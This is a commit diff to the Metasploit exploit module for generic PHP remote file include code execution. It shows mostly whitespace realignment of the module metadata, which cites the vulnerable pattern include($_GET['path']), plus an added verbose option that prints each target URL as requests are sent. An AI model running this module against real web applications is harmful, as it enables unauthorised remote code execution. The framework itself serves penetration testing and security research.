php_include - uses verbose

g0tmi1k · g0tmi1k · commit 98b4c653c086 · 2013-08-17T17:35:09.000+01:00
diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
@@ -16,36 +16,36 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PHP Remote File Include Generic Code Execution',
-			'Description'    => %q{
+			'Name'		 => 'PHP Remote File Include Generic Code Execution',
+			'Description'   => %q{
 					This module can be used to exploit any generic PHP file include vulnerability,
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
 			},
-			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
-			'License'        => MSF_LICENSE,
-			#'References'     => [ ],
-			'Privileged'     => false,
-			'Payload'        =>
+			'Author'		 => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
+			'License'	   => MSF_LICENSE,
+			#'References'	=> [ ],
+			'Privileged'	 => false,
+			'Payload'	   =>
 				{
 					'DisableNops' => true,
-					'Compat'      =>
+					'Compat'	  =>
 						{
 							'ConnectionType' => 'find',
 						},
 					# Arbitrary big number. The payload gets sent as an HTTP
 					# response body, so really it's unlimited
-					'Space'       => 262144, # 256k
+					'Space'	=> 262144, # 256k
 				},
 			'DefaultOptions' =>
 				{
 					'WfsDelay' => 30
 				},
 			'DisclosureDate' => 'Dec 17 2006',
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
+			'Platform'	 => 'php',
+			'Arch'		 => ARCH_PHP,
+			'Targets'	   => [[ 'Automatic', { }]],
 			'DefaultTarget' => 0))
 
 		register_options([
@@ -86,6 +86,9 @@ def datastore_headers
 	end
 
 	def php_exploit
+		# Set verbosity level
+		verbose = datastore['VERBOSE'].to_s.downcase
+
 		uris = []
 
 		tpath = normalize_uri(datastore['PATH'])
@@ -128,21 +131,21 @@ def php_exploit
 		uris.each do |uri|
 			break if session_created?
 
-			# print_status("Sending #{tpath+uri}")
+			print_status("Sending: #{rhost+tpath+uri}") if verbose == "true"
 			begin
 				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
-						'uri'    => tpath+uri,
+						'uri'   => tpath+uri,
 						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
 						{
 							'global'  => true,
-							'uri'     => tpath+uri,
+							'uri'	=> tpath+uri,
 							'method'  => http_method,
-							'data'    => postdata,
+							'data'  => postdata,
 							'headers' => datastore_headers.merge({
 								'Content-Type'   => 'application/x-www-form-urlencoded',
 								'Content-Length' => postdata.length
